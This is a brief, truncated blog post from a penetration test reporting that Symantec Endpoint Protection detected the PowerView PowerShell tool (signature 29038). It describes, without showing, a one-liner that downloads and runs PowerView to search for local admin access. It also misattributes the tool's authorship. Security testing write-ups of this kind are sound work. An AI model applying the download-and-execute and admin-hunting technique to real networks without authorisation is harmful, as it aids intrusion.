PowerView Caught By Symantec Endpoint Protection
It has finally happened: Matt Graeber's PowerView PowerShell cmdlet was caught by Symantec Endpoint Protection (SEP) during a pentest this week. The cmdlet is SID 29038 in Symantec's attack signature database.

Scenario

During testing I used the following one-liner to download and import the powerview.ps1 script and then execute Invoke-FindLocalAdminAccess from a general user's desktop: powershell…